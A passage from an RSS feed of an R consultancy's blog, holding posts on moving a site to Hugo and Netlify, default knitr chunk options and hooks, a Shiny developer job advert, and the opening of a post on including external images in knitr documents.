In fact, we are currently setting up a small Wordpress site to handle
payment for a neat Shiny application we’re working on with a client.
It’s all about using the best tools for each job.&lt;/p&gt;
&lt;p&gt;Overall, the move has has certainly been worthwhile, and my only regret
is not doing it earlier. In saying that, there have been issues. So if
you plan on moving, hopefully the following will help.&lt;/p&gt;
&lt;h2 id="pay-for-netlify-analytics"&gt;Pay for Netlify Analytics&lt;/h2&gt;
&lt;p&gt;If you use Netlify, they offer their own analytics service for $9 per
month. Initially, I couldn’t figure why you would use this over (say),
Google. However, the Netlify analytics doesn’t track users, it tells you
about hits to your site. More importantly, it tells you about pages
returning 404s, i.e. broken links. Even though we spent a long time
ensuring we had redirects in place before switching on Hugo, there were
still dozens of 404s appearing. These links are nicely highlighted via
Hugo Analytics. Sometimes the broken links are when you’ve deleted a
page, other times you’ve made a typo in an internal link. Either way,
fix them.&lt;/p&gt;
&lt;p&gt;However, you’re never going to get the number of “broken links” to zero,
as you will have a low level of bot noise. Our current analytics show a
list of missing Wordpress files that bots have probed for&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/netlify-analytics.png" title="Netlify analytics for jumpingrivers.com" alt="Netlify analytics for jumpingrivers.com" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-moving-to-hugo-tips-tricks-optimisation"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="optimise-your-assets"&gt;Optimise your Assets&lt;/h2&gt;
&lt;p&gt;Netlify lets you easily optimise your web assets. Under &lt;code&gt;Build and Deploy&lt;/code&gt;, you can select which assets to optimise.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/optimise-assets.png" title="Optimise your assets " alt="Optimise your assets " style="width:450px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;Minifying is the process where you minimise your CSS and JS files by
removing all comments, spaces, simplify variable names, etc. For
example, this it the Jumping Rivers &lt;a href="https://d33wubrfki0l68.cloudfront.net/bundles/315a145833a5ec1ef53cb36d3ee4f7b62872a05a.css" rel="external"&gt;minified
CSS&lt;/a&gt;.
Clearly, we don’t write CSS in this way. But it’s been automatically
optimised for web-delivery.&lt;/p&gt;
&lt;p&gt;We implemented lossless compression for images and pretty URLs. The
latter tweaks URLS to avoid redirects. For example,
&lt;a href="https://www.jumpingrivers.com/about/" rel="external"&gt;jumpingrivers.com/about&lt;/a&gt; would
redirect to
&lt;a href="https://www.jumpingrivers.com/about/" rel="external"&gt;jumpingrivers.com/about/&lt;/a&gt;, so
Netlify adds the &lt;code&gt;/&lt;/code&gt; to the links.&lt;/p&gt;
&lt;p&gt;There are lots of other plugins available for optimising site-speed.
However, we have not tried them, as our site is fast enough and this is
a commercial site. We want to minimise the risk of things going wrong.&lt;/p&gt;
&lt;h2 id="use-google-site-speed"&gt;Use Google Site Speed&lt;/h2&gt;
&lt;p&gt;If you are moving to Hugo from an existing site, then it’s worth getting
a before and after via &lt;a href="https://developers.google.com/speed/pagespeed/insights/" rel="external"&gt;Google site
speed&lt;/a&gt;. This
step is nice, because it let’s you see that all your hard work hasn’t
been in vain! Be warned, it’s easy to obsess about shaving off
micro-seconds from your page loading times. Resist this temptation!&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/site-speed.png" title="Google site speed for jumpingrivers.com" alt="Google site speed for jumpingrivers.com" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;h2 id="check-your-rss-feed"&gt;Check your RSS Feed&lt;/h2&gt;
&lt;p&gt;When we initially moved our site our blog posts weren’t picked up by
R-bloggers. With the help of Tal Galili, we discovered a few issues with
our feed; the ultimate problem was at R-bloggers, but the other issues
didn’t help.&lt;/p&gt;
&lt;p&gt;To debug our RSS feed, we used&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://simplepie.org/demo/" rel="external"&gt;https://simplepie.org/demo/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://validator.w3.org/feed/" rel="external"&gt;https://validator.w3.org/feed/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;for quick tests.&lt;/p&gt;
&lt;h2 id="creating-blog-posts-using-rmarkdown"&gt;Creating blog posts using Rmarkdown&lt;/h2&gt;
&lt;p&gt;The majority of our blog posts have an &lt;code&gt;R&lt;/code&gt; flavour and are created using
Rmarkdown and {knitr}. Obviously loving all things R, we decided to
create a simple &lt;a href="https://github.com/jumpingrivers/hugo-rmd" rel="external"&gt;R package&lt;/a&gt;
to make this process easier. Our R package (which will never be on
CRAN), provides solutions to a few common issues.&lt;/p&gt;
&lt;p&gt;The package gives a consistent set of {knitr} options and hooks. For our
blog post, we now set the functions
&lt;code&gt;hugostyle::set_knitr_chunk_options()&lt;/code&gt; and
&lt;code&gt;hugostyle::set_knitr_hooks()&lt;/code&gt; at the top of our &lt;code&gt;Rmd&lt;/code&gt; file. For a
summary of options, see our &lt;a href="https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/" rel="external"&gt;last blog
post&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This package also provides an alternative output style. Instead of using
&lt;code&gt;html_standard&lt;/code&gt; within our YAML header, we use &lt;code&gt;hugostyle::hugo_md&lt;/code&gt;.
This variation in markdown has a small tweak to enforce the use of
&lt;code&gt;fig.alt&lt;/code&gt; tag on our {knitr} images - in the past this is something we
often forgot to add. The template also adds absolute links to our
{knitr} images (see next section).&lt;/p&gt;
&lt;h2 id="absolute-links-for-knitr-images"&gt;Absolute Links for {knitr} Images&lt;/h2&gt;
&lt;p&gt;One of the issues we discovered with our RSS feed, (an issue prevalent
on most blogs) is that simple RSS readers don’t understand relative
links to images, e.g. &lt;code&gt;/page/image.png&lt;/code&gt; vs
&lt;code&gt;https://www.jumpingrivers.com/page/image.png&lt;/code&gt;. This can be solved using
a &lt;a href="https://gohugo.io/content-management/shortcodes/" rel="external"&gt;&lt;code&gt;shortcodes&lt;/code&gt;&lt;/a&gt;. A
shortcode allows us to in insert code during the Hugo build sage. In our
case, we created a file &lt;code&gt;layouts/shortcodes/url.html&lt;/code&gt; that contained the
value &lt;code&gt;{{ .Page.Permalink }}&lt;/code&gt;. In our modified markdown template, we
automatically append all relative URLs with &lt;code&gt;{{&amp;amp;lt; url &amp;amp;gt;}}&lt;/code&gt;. This
means that when we render locally, the URL is &lt;code&gt;localhost:1313&lt;/code&gt;, when we
render on Netlify, it’s
&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;https://www.jumpingrivers.com&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="references"&gt;References&lt;/h3&gt;
&lt;p&gt;If you are interested in moving to Hugo, then these posts are also worth
reading&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In-depth guide to &lt;a href="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/" rel="external"&gt;{knitr} and
images&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Tips and tricks with &lt;a href="https://ropensci.org/blog/2020/04/23/rmd-learnings/" rel="external"&gt;Rmd’s and
Hugo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Getting started with &lt;a href="https://alison.rbind.io/post/2019-02-21-hugo-page-bundles/" rel="external"&gt;Hugo &amp;amp;
R&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/moving-to-hugo-tips-tricks-optimisation/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Default knitr options and hooks</title><link>https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/</link><pubDate>Fri, 12 Mar 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/featured.jpeg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part four of our four part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Specifying the &lt;a href="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/" rel="external"&gt;correct figure
dimension&lt;/a&gt;
in {knitr}.&lt;/li&gt;
&lt;li&gt;Part 2: What &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;image
format&lt;/a&gt;
should you use for graphics.&lt;/li&gt;
&lt;li&gt;Part 3: Including &lt;a href="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/" rel="external"&gt;external
graphics&lt;/a&gt;
in your document&lt;/li&gt;
&lt;li&gt;Part 4: Setting default {knitr} options (&lt;a href="https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/" rel="external"&gt;this
post&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As with many aspects of programming, when you are working by yourself
you can be (slightly) more lax with styles and set-up. However, as you
start working in a team, different styles can quickly become a hindrance
and lead to errors.&lt;/p&gt;
&lt;p&gt;Using &lt;a href="https://github.com/yihui/knitr" rel="external"&gt;{knitr}&lt;/a&gt; is no different. When
you work on documents with different team members, it’s helpful to have
a consistent set of settings. If the default for &lt;code&gt;eval&lt;/code&gt; changes, this
can easily waste time as you try to track down an error. At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping
Rivers&lt;/a&gt;, we use {knitr} a lot. From our
training courses, to providing feedback to clients, to constructing
monthly reports on &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/" rel="external"&gt;clients
infrastructure&lt;/a&gt;.
The great thing about {knitr} is it’s really easy to customise. The bad
thing is that without some care, it’s really easy for every member of
the team to have different default options. This proliferation of
different default options, means that when we pick up someone else
document, mistakes may creep in.&lt;/p&gt;
&lt;p&gt;We’ve found that to work effectively as team, we need a consistent set
of global settings. To be honest, it isn’t really &lt;em&gt;that&lt;/em&gt; important what
the options are, it’s more crucial that they exist. In this post, we’ll
describe the standard {knitr} we have and use.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-knitr-default-options-settings-hooks"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="code-chunks"&gt;Code Chunks&lt;/h2&gt;
&lt;p&gt;These options ensure that code chunks perform in a standard manner. The
options below are relatively standard&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;echo&lt;/code&gt;: for our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;training
courses&lt;/a&gt;, this
is set to&lt;code&gt;TRUE&lt;/code&gt;. For reports to clients, setting this to &lt;code&gt;FALSE&lt;/code&gt;
usually makes more sense.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;collapse = TRUE&lt;/code&gt;: if possible, collapse all the source/output
blocks from multiple chunk into a single block&lt;/li&gt;
&lt;li&gt;&lt;code&gt;comment = &amp;quot;#&amp;gt;&amp;quot;&lt;/code&gt;: pre-pend result with &lt;code&gt;#&amp;gt;&lt;/code&gt;. Default is &lt;code&gt;##&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="graphics-options"&gt;Graphics Options&lt;/h2&gt;
&lt;p&gt;We’ve just had three blog posts on graphics options, so clearly
standardisation is a good thing here! Having a consistent set of
{knitr} options makes standardising figures across documents (slightly)
easier.&lt;/p&gt;
&lt;p&gt;These options control the graphics options.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;fig.path = &amp;quot;graphics/knitr-&amp;quot;&lt;/code&gt;: create a standard directory where
generated figures are stored. For our Hugo blog posts, we set
&lt;code&gt;fig.path = &amp;quot;&amp;quot;&lt;/code&gt; so the images are stored in the same directory as
the &lt;code&gt;md&lt;/code&gt; file.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.width = 6&lt;/code&gt;: the default of 7 is little large for most purposes.
This is coupled with &lt;code&gt;fig.asp = 0.7&lt;/code&gt; to set the aspect ratio. If you
decide you want to set &lt;code&gt;fig.height&lt;/code&gt; in a code chunk, you also need
to set &lt;code&gt;fig.asp = NULL&lt;/code&gt; in that chunk. See the note at the end of
this post for a further discussion on aspect ratios.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.pos = &amp;quot;t&amp;quot;&lt;/code&gt;: when creating PDF documents, place the figures at
the top of the page. Having figures placed where they appear in text
can result in poorly pages, with dangling sentences at the
bottom/top of the page.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.align = &amp;quot;center&amp;quot;&lt;/code&gt;: centre the figure in the document. This
gives the graph a more prominent place.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fig.retina = 2&lt;/code&gt;: use figures suitable for a retina display. The
default if &lt;code&gt;2&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;dpi&lt;/code&gt; differs for HTML and PDF documents. For PDF documents, we set
&lt;code&gt;dpi = 300&lt;/code&gt;, otherwise, we leave it at 72 (see our previous blog
post on &lt;a href=""&gt;optimal figures&lt;/a&gt; for information). We can be clever, and
set &lt;code&gt;dpi = if (knitr::is_latex_output()) 72 else 300&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;out.width = 100%&lt;/code&gt;: We typically set this on a graph by graph basis.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="graphics-device"&gt;Graphics Device&lt;/h3&gt;
&lt;p&gt;The graphics device is the default device for used to create and provide
graphics. This options is controlled via the &lt;code&gt;dev&lt;/code&gt; argument. For our
training courses, where we produce PDF booklets of notes we set &lt;code&gt;dev = &amp;quot;cairo_pdf&amp;quot;&lt;/code&gt; as the default. For blog post and HTML documents, such as
this, we set &lt;code&gt;dev = &amp;quot;svg&amp;quot;&lt;/code&gt;. We also set &lt;code&gt;dev.args = list(png = list(type = &amp;quot;cairo-png&amp;quot;))&lt;/code&gt;, so that when we set &lt;code&gt;dev = &amp;quot;png&amp;quot;&lt;/code&gt;, we use the
&lt;code&gt;cairo-png&lt;/code&gt; variety.&lt;/p&gt;
&lt;h2 id="knitr-hooks"&gt;{knitr} hooks&lt;/h2&gt;
&lt;p&gt;In our recent blog post on &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;optimising
PNG&lt;/a&gt;
images, we discussed the &lt;code&gt;optipng&lt;/code&gt; utility for reducing your file size.
It’s actually straightforward to use &lt;code&gt;optipng&lt;/code&gt; as a {knitr} hook, i.e.
whenever you generate a PNG file, &lt;code&gt;optipng&lt;/code&gt; automatically runs.&lt;/p&gt;
&lt;p&gt;If you have &lt;code&gt;optipng&lt;/code&gt; installed, you simply add the hook&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;knit_hooks&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(optipng &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;hook_optipng)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;to the top of your document. You can also tweak the options via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# The args `-o1 -quiet&amp;#39; are passed to optipng&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;opts_chunk&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(optipng &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;-o1 -quiet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="putting-it-all-together"&gt;Putting it all together&lt;/h2&gt;
&lt;p&gt;When we put all of the above together, we end up with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;opts_chunk&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(echo &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; collapse &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; comment &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#&amp;gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fig.path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;graphics/knitr-&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fig.retina &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# Control using dpi&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fig.width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# generated images&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fig.pos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;t&amp;#34;&lt;/span&gt;, &lt;span style="color:#8b949e;font-style:italic"&gt;# pdf mode&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fig.align &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;center&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dpi &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is_latex_output&lt;/span&gt;()) &lt;span style="color:#a5d6ff"&gt;72&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;300&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; out.width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dev &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;svg&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dev.args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(png &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;cairo-png&amp;#34;&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; optipng &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;-o1 -quiet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This can then be placed in an simple helper package to avoid
duplication.&lt;/p&gt;
&lt;h3 id="a-note-on-aspect-ratio-figasp"&gt;A note on aspect ratio: fig.asp&lt;/h3&gt;
&lt;p&gt;As with all graphic related options, there isn’t one single setting that
is suitable for all situations. While &lt;code&gt;fig.asp=0.7&lt;/code&gt; gives a sensible
default, you shouldn’t be frighted to change it. I found this article on
when to use &lt;a href="https://graphworkflow.com/enhancement/aspect/" rel="external"&gt;different
aspect&lt;/a&gt; ratios very
informative. R for Data Science also has a short section on &lt;a href="https://r4ds.had.co.nz/graphics-for-communication.html#figure-sizing" rel="external"&gt;figure
sizing&lt;/a&gt;
that’s worth reading.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Job: Shiny Developer</title><link>https://www.jumpingrivers.com/blog/job-shiny-developer/</link><pubDate>Fri, 12 Mar 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/job-shiny-developer/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/job-shiny-developer/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/job-shiny-developer/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We are currently developing a SAAS Shiny application. We have a
prototype that is functional, but not ready for release. Your role will
be to refactor the application, and push it towards public release. The
core requirements for this role is Shiny experience, plus CSS and
Javascript. If you have experience in deployment that’s great, but isn’t
required.&lt;/p&gt;
&lt;p&gt;This Shiny application will be your main role, but not your only one. As
a small company, we often take on a variety of jobs. In particular,
helping out with new and on-going Shiny related projects. An approximate
split would be 2.5 days on the SAAS Shiny app and 2.5 days on other
projects.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Location:&lt;/strong&gt; Remote, but within the UK.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Salary:&lt;/strong&gt; ~£25K - £40K&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Application:&lt;/strong&gt; CVs can be submitted via
&lt;a href="https://jumping-rivers.welcomekit.co/" rel="external"&gt;welcomekit.co&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="technical-duties"&gt;Technical duties:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Building web applications using R and Shiny&lt;/li&gt;
&lt;li&gt;Basic data analysis using R and/or Python&lt;/li&gt;
&lt;li&gt;Depending on the applicant, provide technical training&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="client-contact"&gt;Client contact:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Attend on-site client meetings (at some point in the future)&lt;/li&gt;
&lt;li&gt;Off-site meetings via video conference call&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="technologies"&gt;Technologies&lt;/h3&gt;
&lt;p&gt;The following is to give you a flavour of how Jumping Rivers runs
internally. If you have never used these tools, don’t worry, we can
teach you.&lt;/p&gt;
&lt;p&gt;Almost everyone uses Linux, from the Admin team to the data scientists.
We all use GitLab. Our main languages are R &amp;amp; Python.&lt;/p&gt;
&lt;h3 id="preferred-experience"&gt;Preferred Experience&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Shiny experience! One of your first interview questions will ask
you to take us through a recent Shiny application you have
developed.&lt;/li&gt;
&lt;li&gt;CSS and Javascript&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://jumping-rivers.welcomekit.co/" rel="external"&gt;Apply Now&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;{{&amp;lt; rstudio-pro-advert &amp;gt;}}&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/job-shiny-developer/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>External Graphics with knitr</title><link>https://www.jumpingrivers.com/blog/knitr-include-graphics-external/</link><pubDate>Tue, 23 Feb 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/knitr-include-graphics-external/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/knitr-include-graphics-external/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/featured.jpeg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part three of our four part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Specifying the &lt;a href="https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/" rel="external"&gt;correct figure
dimension&lt;/a&gt;
in {knitr}.&lt;/li&gt;
&lt;li&gt;Part 2: What &lt;a href="https://www.jumpingrivers.com/blog/knitr-image-png-jpeg-svg-rmarkdown/" rel="external"&gt;image
format&lt;/a&gt;
should you use for graphics.&lt;/li&gt;
&lt;li&gt;Part 3: Including &lt;a href="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/" rel="external"&gt;external
graphics&lt;/a&gt;
in your document (this post).&lt;/li&gt;
&lt;li&gt;Part 4: Setting default {knitr}
&lt;a href="https://www.jumpingrivers.com/blog/knitr-default-options-settings-hooks/" rel="external"&gt;options&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this third post, we’ll look at including eternal images, such as
figures and logos in HTML documents. This is relevant for all R markdown
files, including fancy things like {bookdown}, {distill} and {pkgdown}.
The main difference with the images discussed in this post, is that the
image &lt;em&gt;isn’t&lt;/em&gt; generated by R. Instead, we’re thinking of something like
a photograph. When including an image in your web-page, the two key
points are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What size is your image?&lt;/li&gt;
&lt;li&gt;What’s the size of your HTML/CSS container on your web-page?&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="sizing-your-image"&gt;Sizing your image&lt;/h2&gt;
&lt;p&gt;Let’s suppose we want to include a (pre-covid) picture of the &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping
Rivers&lt;/a&gt; team. If you click on the
&lt;a href="https://www.jumpingrivers.com/blog/knitr-include-graphics-external/office.jpeg"&gt;original picture&lt;/a&gt;, you’ll see that it takes a second to
load and also fills the page. This is a &lt;strong&gt;very&lt;/strong&gt; strong hint that the
dimensions need to be changed. On our web-page, we intend to place the
image as a featured image (think the header image of a blog post). The
dimensions of this is 400px by 400px (typically the resolution will be
larger than this).&lt;/p&gt;
&lt;p&gt;We can determine the image dimensions of our original image using the
{imager} package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;imager&amp;#34;&lt;/span&gt;)
